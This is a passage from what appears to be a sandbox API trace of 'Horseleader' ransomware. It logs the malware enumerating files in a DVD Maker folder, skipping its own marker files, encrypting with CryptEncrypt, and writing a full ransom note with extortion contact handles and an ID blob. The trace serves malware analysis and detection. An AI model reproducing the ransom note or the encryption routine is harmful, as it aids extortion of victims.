lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.709] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72323c5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72323c5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ed4233f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe3dca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref.wmv", cAlternateFileName="")) returned 1 [0251.709] lstrcmpiW (lpString1="Title_Page_Ref.wmv", lpString2="Windows") returned -1 [0251.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv") returned 71 [0251.709] StrStrIW (lpFirst="Title_Page_Ref.wmv", lpSrch=".horseleader") returned 0x0 [0251.709] lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.709] 
lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="_uninstalling_.png") returned 1 [0251.709] lstrlenW (lpString=".testttjffg") returned 11 [0251.709] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", lpSrch=".testttjffg") returned 0x0 [0251.709] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.709] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.709] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 1 [0251.709] lstrcmpiW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="Windows") returned -1 [0251.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv") returned 75 [0251.709] StrStrIW (lpFirst="Title_Page_Ref_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.709] lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.709] 
lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.710] lstrlenW (lpString=".testttjffg") returned 11 [0251.710] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.710] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.710] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.711] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 0 [0251.711] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.712] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\#Decrypt#.txt") returned 66 [0251.712] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\pets\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.713] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.713] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.715] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.715] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.715] CloseHandle (hObject=0x158) returned 1 [0251.715] 
GetProcessHeap () returned 0x780000 [0251.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee00a15, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x4ee00a15, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_buttongraphic.png", cAlternateFileName="")) returned 1 [0251.715] lstrcmpiW (lpString1="photoedge_buttongraphic.png", lpString2="Windows") returned -1 [0251.715] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned 75 [0251.715] StrStrIW (lpFirst="photoedge_buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.715] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.715] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.715] lstrlenW (lpString=".testttjffg") returned 11 [0251.715] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.716] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8601df, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8601df, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1274, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.716] lstrcmpiW (lpString1="photoedge_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.716] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned 81 [0251.716] StrStrIW (lpFirst="photoedge_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.716] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.716] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.716] lstrlenW (lpString=".testttjffg") returned 11 [0251.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.716] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e88633c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e88633c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_videoinset.png", cAlternateFileName="")) returned 1 [0251.716] lstrcmpiW (lpString1="photoedge_videoinset.png", lpString2="Windows") returned -1 [0251.717] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned 72 [0251.717] StrStrIW (lpFirst="photoedge_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.717] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.717] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.717] lstrlenW (lpString=".testttjffg") returned 11 [0251.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.717] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.717] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.717] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.717] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efaa4ac, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efaa4ac, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x59b9, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.717] lstrcmpiW (lpString1="Postage_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.717] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned 73 [0251.717] StrStrIW (lpFirst="Postage_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.717] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.717] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.717] lstrlenW (lpString=".testttjffg") returned 11 [0251.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.717] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.717] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 
[0251.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.719] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.719] lstrcmpiW (lpString1="Postage_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.719] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned 79 [0251.719] StrStrIW (lpFirst="Postage_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.719] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.719] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.719] lstrlenW (lpString=".testttjffg") returned 11 [0251.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | 
out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.720] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_VideoInset.png", cAlternateFileName="")) returned 1 [0251.720] lstrcmpiW (lpString1="Postage_VideoInset.png", lpString2="Windows") returned -1 [0251.720] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned 70 [0251.720] StrStrIW (lpFirst="Postage_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.720] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.720] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.720] lstrlenW (lpString=".testttjffg") returned 11 [0251.720] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.720] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Push", cAlternateFileName="")) returned 1 [0251.720] lstrcmpiW (lpString1="Push", lpString2="Windows") returned -1 [0251.720] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 52 [0251.720] lstrcmpW (lpString1="Push", lpString2=".") returned 1 [0251.720] lstrcmpW (lpString1="Push", lpString2="..") returned 1 [0251.721] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.721] GetProcessHeap () returned 0x780000 [0251.721] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.721] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*") returned 54 [0251.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\.") returned 54 [0251.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.723] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\..") returned 55 [0251.723] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.723] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
